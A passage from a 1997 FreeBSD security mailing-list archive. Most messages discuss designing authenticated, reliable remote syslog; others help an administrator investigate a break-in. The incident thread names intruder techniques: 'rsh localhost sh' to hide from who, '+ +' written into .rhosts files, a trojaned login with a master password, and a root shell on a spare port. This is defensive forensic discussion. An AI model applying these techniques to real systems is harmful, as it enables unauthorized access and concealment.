Watson Reply-To: Robert Watson To: Dug Song cc: David Holland , freebsd-security@freebsd.org Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Dug Song wrote: > i've looked for years for a secure syslog/d replacement, and the only > thing i've heard of that even comes close is a redirection through an SSH > tunnel. I've been experimenting with SSH as a generic tunneling tool, but have had problems maintaining connections, and determining correct behavior in various situations. It seems like the overhead involved here may be a problem. IPsec might offer some solutions, but isn't generally available just now. DNSsec as a means of IPsec SPI keying sounds good as a general security tool. :) > in our case, we're looking at a Kerberized solution, but this carries way > too much overhead to be useful. what we really want from syslog is Someone else suggested kerberos as a solution, but it has somewhat more limited application than a general-purpose security architecture for syslog. I use Kerberos for my own machines, as well as at Carnegie Mellon, and the overhead seems significant. It also brings up some questions about the identities of the various syslog participants. As an individual, must I have a kerberos principal associated with me to be able to log? Do I need a ticket (probably)? Does this mean storing passwords for the keys on systems that require it (presumably a srvtab of some kind), which might cause additional concerns? In some ways, it would be great to have Kerberos authenticate all log messages -- I could know that this log message can from proto@WATSON.org, or robert.admin@WATSON.ORG, etc. But not everyone runs Kerberos, and there are enough complications to suggest an unkerberized answer might work best. Perhaps we can work in a named-keying system that allows DNSsec keys to be used, IPsec, etc. I'd rather not use a session mechanism, as reinitializing a session can be time-consuming, hard to identify, not to mention inappropriate in some circumstances. Using a set key-name and key is more efficient and easier to design. General-purpose key management is still in the wings, so maybe a short term solution involving just a shared secret is the answer for now? > 1. some degree of auditability, such as local UIDs in each message, to > deter the local denial-of-service attack. this is the best i've come > up with, because syslog() really needs to be available to j. random > process. I'm tempted to disassociate the network security issues and local security issues for now. This is hard to do in a Kerberos environment (and not really useful in a Kerberos environment), but for most people there is a benefit. I was envisioning more of a host-to-host security mechanism for syslog, and then allowing syslog daemons on hosts to do what they wished. Servers would stored the identity of the host based on the keyname (usually of a shared secret) that authenticated the message, and clients could store additional information at their option in the message. In this case, a username or uid. If greater security is needed, keynames can be in the context of a more diversified namespace, such as that of DNS/DNSsec. a log message could come from FQDN, or from identity.FQDN, if a key is configured on the server, and permitted to send the type of log message in question. Use of the DNSsec keyspace isn't really established, yet, though. > 2. some degree of authentication/authorization, as provided by a shared > key between loghost and client machines. session key establishment is > too much overhead, i think. a long-term shared secret is a bad idea > in general but is probably reasonable to consider for this application. > either that, or hourly rekeying, or something else that takes less > work than generating/distributing a new session key for every message. > maybe one of the EKE variants would be appropriate for this (is there > an EKE-like protocol that doesn't do modular exponentiation, BTW)? I agree, and also raises questions if a system reboots, moves, etc. keyname/shared secret pairs are probably the answer unless public/private keying gets a bit faster. Then one could authenticate messages using DNSsec to a name, and a set of names would be permitted to send log messages by a syslog.conf file. E.g., permit fledge.watson.org/145 permit cyrus.watson.org/145 <-- /145 indicates the key footprint to use I retrieve the pub key and verify the packet against it for the first packet, and cache the key for future packets. In a high-volume logging environment, this might be too heavy, in which case a shared secret could be used: permit fledge.watson.org.local HMAC-MD5 xxxxxkeyxxxxxxxxxx permit cyrus.watson.org.local HMAC-MD5 xxxxxkeyxxxxxxxxxx Some form of chunking/clustering of log messages would be especially useful in the pub/private key case. > 3. message integrity, and maybe privacy. HMACs are good, but maybe > something like rc5 would be okay. i just don't want to incur the > overhead of DES or IDEA (maybe this could be configurable?). > > i guess 2 and 3 are only really applicable in the loghost (as opposed to > local logging) scenario. anyhow, i'm just brainstorming here, let me know > if you have any other thoughts on this. Is privacy an issue for logging? It would appear to be for authentication information, as security of logs is important for protecting a host. Especially things like login retries where the username is listed, and might be the password typed at the login: prompt :). I've been thinking only in terms of integrity, but privacy might be important too.. A similar key naming system may work, but choice of algorithms is an issue (not to mention export control :). small keys are probably ok since logs aren't all-that-sensitive? Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 08:56:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA14280 for security-outgoing; Mon, 28 Jul 1997 08:56:12 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA14272 for ; Mon, 28 Jul 1997 08:56:06 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.5/8.7.3) id IAA17841; Mon, 28 Jul 1997 08:55:23 -0700 (PDT) From: "Rodney W. Grimes" Message-Id: <199707281555.IAA17841@GndRsh.aac.dev.com> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281340.JAA03478@homeport.org> from Adam Shostack at "Jul 28, 97 09:40:14 am" To: adam@homeport.org (Adam Shostack) Date: Mon, 28 Jul 1997 08:55:23 -0700 (PDT) Cc: dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > | I don't know of any; if you run across one or are thinking about > | designing one, please post or mail... absent any other readily > | available secure mechanism probably the best bet is to carry log data > | over ssh. Of course, this doesn't solve the denial of service issue as > | anyone with a login can spam the local syslog. > > I've been working on a draft set of requirements--very drafty, but > since the subject came up, I'll share & ask for feedback. > > > Requirements > > Reliability: The system must make substantial efforts to not > lose information. > > Network Requirements > TCP based > Application sequencing with explicit ack before sender deletes How are you going to handle the log server going away and coming back?? > Application Reliability > NO data discarding > Solid message handling locally-messages kept until discard > Repeated message management (?) > > Portability > External Alerting > External Intrusion Detection linking Security: The data over the network must be unreadable unless a secret is known. Syslog data can contain confidential information. How about just converting syslog/syslogd to handle a kerberized t/tcp connection?? -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Mon Jul 28 09:09:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA14889 for security-outgoing; Mon, 28 Jul 1997 09:09:13 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA14881 for ; Mon, 28 Jul 1997 09:09:04 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA04611; Mon, 28 Jul 1997 12:04:52 -0400 (EDT) From: Adam Shostack Message-Id: <199707281604.MAA04611@homeport.org> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281555.IAA17841@GndRsh.aac.dev.com> from "Rodney W. Grimes" at "Jul 28, 97 08:55:23 am" To: rgrimes@GndRsh.aac.dev.com (Rodney W. Grimes) Date: Mon, 28 Jul 1997 12:04:52 -0400 (EDT) Cc: adam@homeport.org, dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Rodney W. Grimes wrote: | > Reliability: The system must make substantial efforts to not | > lose information. | > | > Network Requirements | > TCP based | > Application sequencing with explicit ack before sender deletes | | How are you going to handle the log server going away and coming back?? The client will have to queue messages. Its possible that TCP message queueing will handle this, its also possible that the application will need some retransmit smarts, which would be unfortunate, since it adds a good deal of complexity. Should there be a capability for multiple log servers (like mail?) | > Application Reliability | > NO data discarding | > Solid message handling locally-messages kept until discard | > Repeated message management (?) | > | > Portability | > External Alerting | > External Intrusion Detection linking | | Security: The data over the network must be unreadable | unless a secret is known. Syslog data can contain | confidential information. Is confidentiality or authenticity important? For my purposes, its authentication. Should we simply allow the use of IPsec or SSH port forwarding for confidentiality and authentication? It cuts complexity substantially. | How about just converting syslog/syslogd to handle a kerberized | t/tcp connection?? Syslog still discards data when its local daemon cache gets too full. It discards data when forwarding messages from host a via host B to host C. (Yes, real case.) It loses priority and type when putting messages into files Not that kerberizing a TCP based syslog would be bad, I just don't think its sufficient. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Jul 28 10:09:15 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA18435 for security-outgoing; Mon, 28 Jul 1997 10:09:15 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA18430 for ; Mon, 28 Jul 1997 10:09:09 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id NAA03536; Mon, 28 Jul 1997 13:08:44 -0400 (EDT) Date: Mon, 28 Jul 1997 13:08:43 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Adam Shostack cc: "Rodney W. Grimes" , dholland@eecs.harvard.edu, security@FreeBSD.ORG Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281604.MAA04611@homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Adam Shostack wrote: > Rodney W. Grimes wrote: > > | How are you going to handle the log server going away and coming back?? > > The client will have to queue messages. Its possible that TCP > message queueing will handle this, its also possible that the > application will need some retransmit smarts, which would be > unfortunate, since it adds a good deal of complexity. I doubt TCP queuing will be sufficient -- if the TCP connection is severed for some reason, I don't want my data to be quietly eaten. The specific ACK'ing of all data before clearing it from the queue seems to be a must. It also adds an additional level of data insertion checking. The added complexity is unfortunatee, but seems necessary. To decrease load on forwarding syslog daemons, the daemon should only retain for forwarding log messages that are authenticated. What should be the behavior of syslog if its queue gets extremely large, and it has lost contact with the loghost? Ideally, only the loghost itself should make decisions regarding discarding data, as it would have the policy stored in its .conf file. However, hosts choosing to use network logging may only want to exports certain types of log messages from their own logger. Is it acceptable to have a forwarder filter log messages according to its own logging rules? Should this be a best-effort arrangement? It is not desirable for me to be able to shut down a site by severing its forwarding connection somehow, and then filling up the forwarding host, but I shouldn't lose messages unless absolutely necessary. I'd rather have the forwarder save them in a file and delivery them later, which is sounding increasing sendmail-like. Perhaps we should add another field that has bits to define the requirement that a given log message be transmitted using authenticity, confidentiality, and whether it is worth being stored. In any situation where there was significant doubt, the message would be discarded for security reasons, or logged locally and a message passed later to indicate the problem. Also, should authenticity by against a global name space (DNSsec), and then permission to store messages from a given identity by defined against that name space, or should it be for transaction-level only? I'd almost be tempted to define a wrapper packaging for syslog messages like so: u_int16_t sl_flags u_int8_t sl_prot_type u_int8_t sl_entity_len u_int8_t sl_entity[] u_int32_t sl_timesigned u_int16_t sl_type u_int16_t sl_priority u_int16_t sl_msglen u_int8_t sl_message[] u_int8_t sl_signature_len u_int8_t sl_signature[] Where the signature is over all values present except for the signature+length itself. Type of protection used would be in the protection type field. This would allow storage of complete log entry entities, including the signing identity, signature that proves it signed the data, priority, etc. This would not provide for guarunteed delivery- -- that would be the responsibility of the transport mechanism used by syslog. This could actually by the stored log entry used on syslog servers. To prevent replay (if not provided by the transport), perhaps a sl_log_id (u_int16_t?) could be provided, which would also indicate jumps in the sequence, etc. > Should there be a capability for multiple log servers (like > mail?) Hmm. Multiple destinations yes, but I'm not sure about choosing log servers for load balancing, or backup purposes. Maybe we are looking at an alternate LH RR-type in DNS? A single name, loghost.watson.org would have loghost IN LH 10 loghost.watson.org. IN LH 20 logback.watson.org. A TCP session would remain established as long as it could, and if further connections failed, would bounce to the next in the sequence? I'm not sure how to rectify the split log arrangement where bits of log end up all over the place. On the other hand, I don't want to lose log entries when my main loghost reboots or loads a new syslog version. Load balancing could be arranged using two LH entries with the same level...? This benefits here seem spotty, but it would be a useful function if a more elegant mechanism can be devised -- preferably one not this complicated? :) The more complicated it is, the more likely it will have a problem and be required to log its errors :) > | > Application Reliability > | > NO data discarding > | > Solid message handling locally-messages kept until discard > | > Repeated message management (?) > | > > | > Portability > | > External Alerting > | > External Intrusion Detection linking > | > | Security: The data over the network must be unreadable > | unless a secret is known. Syslog data can contain > | confidential information. > > Is confidentiality or authenticity important? For my > purposes, its authentication. Should we simply allow the use of IPsec > or SSH port forwarding for confidentiality and authentication? It > cuts complexity substantially. Confidentiallity should be option, but available. Authentication errors, as well as serious debugging errors (etc), should not pass unencrypted on the line. It might even be ideal to be able to specify whether a particular log level or type required confidentiality -- I could lower the cost of logging by not requiring mail.* entries to be confidential. Correct me if I'm wrong, but I don't believe UDP over IPsec does not provide replay protection, retransmission, etc. I think it just provides authenticity and integrity protection, as well as confidentiality. It doesn't provide TCP-esque ordering, etc. IPsec protecting TCP would provide this feature. IPsec seems like a good tool, but it is not widely available yet, so I'd rather not rely on its being there, for now. It also doesn't provide a keying mechanism, relying on some key distribution system, as well as ISAKMP/Oakley. I'm not sure what the current implementations look like, so I don't know how simple it would be to implement. SSH may offer too much overhead, providing some but not all of the features required? I haven't work with SSH on the programming side, only on the application side, so am not familiar with it as a tool for this type of activity. Could someone provide an evaluation of SSH in terms of providing the requirements we've discussed? > > | How about just converting syslog/syslogd to handle a kerberized > | t/tcp connection?? > > Syslog still discards data when its local daemon cache gets too full. > It discards data when forwarding messages from host a via host B to > host C. (Yes, real case.) It loses priority and type when putting > messages into files I feel that, in file format, log data should retain all of the features it had when generated, in addition to authenticity information attached by the loghost. > Not that kerberizing a TCP based syslog would be bad, I just don't > think its sufficient. I suspect there are a number of other complications in kerberizing syslog, including the identities taken on by various parties generating the log messages? Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 10:23:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA19106 for security-outgoing; Mon, 28 Jul 1997 10:23:46 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA19097 for ; Mon, 28 Jul 1997 10:23:43 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id NAA04255; Mon, 28 Jul 1997 13:22:44 GMT Date: Mon, 28 Jul 1997 13:22:44 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Ollivier Robert cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <19970728171633.10794@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I would check also /etc/inetd.conf to make sure he didn't set himself up with a root-environment on some port, I know finger -P will let you run for example a shell, and if it is set up as root, well... ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Ollivier Robert wrote: :According to Vincent Poy: :> 1) User on mercury machine complained about perl5 not working which was :> perl5.003 since libmalloc lib it was linked to was missing. :> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 :> and it works. : :I don't think he used perl to hack root unless you kept old versions of :Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by :Werner. 5.003+ holes are fixed in 5.004 and later. : :> 6) We went to inetd.conf and shut off all daemons except telnetd and :> rebooted and user still can get onto the machine invisibly. : :That shows that he has used a spare port to hook a root shell on. In these :case, "netstat -a" or "lsof -i:TCP" will give you all connections, :including those on which a program is LISTENing to. That way you'll catch :any process left on a port. : :-- :Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr :FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997 : From owner-freebsd-security Mon Jul 28 10:26:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA19233 for security-outgoing; Mon, 28 Jul 1997 10:26:07 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA19226 for ; Mon, 28 Jul 1997 10:26:05 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id NAA04379 for ; Mon, 28 Jul 1997 13:25:24 GMT Date: Mon, 28 Jul 1997 13:25:24 +0000 (GMT) From: "Jonathan A. Zdziarski" To: security@freebsd.org Subject: security hole in bsd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk BTW: You said you didn't know how he hacked into your other system as he doesn't have an account on it. Do you have a .rhosts file in the root directory of the other server or a hosts.equiv file allowing the two to share root/other privileged logins between the two? As root he'd be able to su to anything. How about NFS/rdist permissions? ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 10:27:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA19329 for security-outgoing; Mon, 28 Jul 1997 10:27:31 -0700 (PDT) Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.241]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA19315 for ; Mon, 28 Jul 1997 10:27:24 -0700 (PDT) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.5/8.7.3) id KAA18251; Mon, 28 Jul 1997 10:26:47 -0700 (PDT) From: "Rodney W. Grimes" Message-Id: <199707281726.KAA18251@GndRsh.aac.dev.com> Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: <199707281604.MAA04611@homeport.org> from Adam Shostack at "Jul 28, 97 12:04:52 pm" To: adam@homeport.org (Adam Shostack) Date: Mon, 28 Jul 1997 10:26:47 -0700 (PDT) Cc: adam@homeport.org, dholland@eecs.harvard.edu, robert@cyrus.watson.org, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > Rodney W. Grimes wrote: > | > Reliability: The system must make substantial efforts to not > | > lose information. > | > > | > Network Requirements > | > TCP based > | > Application sequencing with explicit ack before sender deletes > | > | How are you going to handle the log server going away and coming back?? > > The client will have to queue messages. Its possible that TCP > message queueing will handle this, its also possible that the > application will need some retransmit smarts, which would be > unfortunate, since it adds a good deal of complexity. TCP message queueing won't handle the fact that the server has rebooted and the connection is going to get a ``reset by peer'' next time you try to send data on it. Your going to need some very robust code ala what NFSV3 over TCP does in order to handle the server coming and going. > Should there be a capability for multiple log servers (like > mail?) Probably a really good thing! > | > Application Reliability > | > NO data discarding > | > Solid message handling locally-messages kept until discard > | > Repeated message management (?) > | > > | > Portability > | > External Alerting > | > External Intrusion Detection linking > | > | Security: The data over the network must be unreadable > | unless a secret is known. Syslog data can contain > | confidential information. > > Is confidentiality or authenticity important? For my Both confidentiality and authenticity are important. Realize syslog may be logging login failures, some systems pass the attempted username in login failure cases, and often this is a passwd due to out of sequence data entry (user entered passwd at username prompt). Go grep /var/log/messages on a few 100 timeshareing systems and you can often come up with a password or two, then you just have to match it to a user... > purposes, its authentication. Should we simply allow the use of IPsec > or SSH port forwarding for confidentiality and authentication? It > cuts complexity substantially. That would be one solution, but not all hosts implement IPsec. SSH would work, but SSH can't handle the fact that the server got rebooted and you have to establish a new connection. > | How about just converting syslog/syslogd to handle a kerberized > | t/tcp connection?? > > Syslog still discards data when its local daemon cache gets too full. No matter what you do your not going to totally fix the discard data problem. Even a malloc'ed data structure will sooner or later fill all memory and all swap space. A disk based queue could fill all disk space. This ``discard data'' problem is a real bear! > It discards data when forwarding messages from host a via host B to > host C. (Yes, real case.) It loses priority and type when putting > messages into files > > Not that kerberizing a TCP based syslog would be bad, I just don't > think its sufficient. But it is a steep in the right direction. Could be implemented in a day or two of work. -- Rod Grimes rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD From owner-freebsd-security Mon Jul 28 11:01:03 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA21372 for security-outgoing; Mon, 28 Jul 1997 11:01:03 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA21362 for ; Mon, 28 Jul 1997 11:01:00 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id KAA05162; Mon, 28 Jul 1997 10:59:31 -0700 (PDT) Date: Mon, 28 Jul 1997 10:59:30 -0700 (PDT) From: Vincent Poy To: Eric Feillant cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <33DC9377.655C@EUnet-Bretagne.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Eric Feillant wrote: =)Another way to be invisible is to try something like that: =) =)rsh localhost sh =) =)A w or who command see nothing. A ps does. That may be true too since I was looking and there were .rhosts file in directories of users that were not there before and the .rhosts file just had two +'s for the contents. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:24:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA22738 for security-outgoing; Mon, 28 Jul 1997 11:24:12 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA22729 for ; Mon, 28 Jul 1997 11:24:07 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id LAA05246; Mon, 28 Jul 1997 11:23:41 -0700 (PDT) Date: Mon, 28 Jul 1997 11:23:40 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)> He wasn't invisible to netstat but he did do something that faked =)> the hostname even in netstat. =) =)In this case, the chances are he just inserted some dud DNS entries, or =)simply set his in-addr.arpa to something nasty. There's nothing one can =)do to prevent an authoritative name entry (trash or not) from being =)accepted in DNS or DNSsec. One thing I would like to see is logging of IP =)address *and* hostname in the logs. Both are useful, depending on the =)situation. Due to the nature of TCP, IP addresses are fairly useful in =)tracing an attack, but often, especially after a time delay, hostnames are =)the only way to easily contact the maintainer of the IP address. Hostname =)is also more useful in spotting attacks in the first place, as it's easy =)for a user to tell when they've logged in from somewhere they haven't :). I don't think he can change his in-addr.arpa since he was using his Linux machine from a Netcom ppp connection. What he did was move netstat to another filename so he didn't think we had access to netstat but thanks to screen's invisibility mode and FreeBSD -current, I recompiled the thing and reinstalled in less than 20 seconds while jbhunt was talking to him and saw his source address as wil-de7-10.ix.netcom.com so many thanks to jmb also here that I did on both mercury and earth: route add -hosts his-ip our-ip -reject And the next thing we know, he was back from sh.janey.com so I blocked that out too and then he came back and netstat didn't work anymore this time. It showed fake names such as FreeBSD.HACK.U.NOW:telnet and a bunch of other garbage. According to Mario, theca@wil-de7-10.ix.netcom.com is known to be hacking machines all over the place and no one has stopped him yet. =)BTW, does anyone know if there is a secure logging protocol? Syslog on =)UDP seems a tad unreliable, not to mention opening one up from DoS. I log =)to a loghost, and that machine could easily suffer DoS from log flooding, =)etc. A simple signature arrangement using MD5 (HMAC?) similar to DNS TSIG =)would be easy enough to arrange, and far more secure. I assume someone, =)somewhere has written one, or implemented one, but I haven't been =)following the Internet Draft releases to closely. Yep, I think he did something to syslogd since he did come in via a telnet connection but the tcp wrappers didn't show his connections but all other connections were logged. =)> =)There was a security hole some time ago in perl that allowed local users =)> =)to gain root access... That's probably the way he got root access... =)> =)I would check my binaries, sup and recompile. =)> =)> Hmmm, I supped the perl from the most recent ports tree and also =)> all the binaries are about 2 months old from the -current tree. I thought =)> the security hole was way before that. What I didn't get is how did he =)> get access to the second system (earth) when he doesn't have a account =)> there in the first place? =) =)I'd be tempted to look in all the normal places -- sendmail, etc. What =)daemons were running on the machine? Any web server processes? Also, I'd =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be =)extremely unhappy if we already know (s)he is messing with DNS entries. sendmail is running as well as apache httpd... ftpd, telnetd, and ircd. No NIS. ALl I know was he managed to changed everyone's .rhosts file when it doesn't exist originally and the contents just had: + + in it. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:28:16 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA22953 for security-outgoing; Mon, 28 Jul 1997 11:28:16 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA22938 for ; Mon, 28 Jul 1997 11:28:11 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id LAA05264; Mon, 28 Jul 1997 11:27:34 -0700 (PDT) Date: Mon, 28 Jul 1997 11:27:33 -0700 (PDT) From: Vincent Poy To: Guido van Rooij cc: robert@cyrus.watson.org, loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707281353.PAA04645@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Guido van Rooij wrote: =)> BTW, does anyone know if there is a secure logging protocol? Syslog on =)> UDP seems a tad unreliable, not to mention opening one up from DoS. I log =) =)Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped =)with an option -s that makes it refuse syslog messages form remote =)machins. This of course does not help if you want to be able to get =)syslog entries from a remote host. But you can refure udp packet =)with destination port 513 on your routers. How would one do this with a FreeBSD based router using the ET Cards? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:31:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23160 for security-outgoing; Mon, 28 Jul 1997 11:31:12 -0700 (PDT) Received: from caliban.dihelix.com (caliban.dihelix.com [198.180.136.138]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23149 for ; Mon, 28 Jul 1997 11:31:07 -0700 (PDT) Received: (from langfod@localhost) by caliban.dihelix.com (8.8.6/8.8.3) id IAA15209; Mon, 28 Jul 1997 08:30:49 -1000 (HST) Message-Id: <199707281830.IAA15209@caliban.dihelix.com> Subject: Re: security hole in FreeBSD In-Reply-To: from Vincent Poy at "Jul 28, 97 03:19:55 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Mon, 28 Jul 1997 08:30:48 -1000 (HST) Cc: security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net From: "David Langford" X-blank-line: This space intentionaly left blank. X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I recently caught a breakin faily simaliar. The perp replace /bin/login with one that would let them login to ANY account with a password of "lemmein". The login 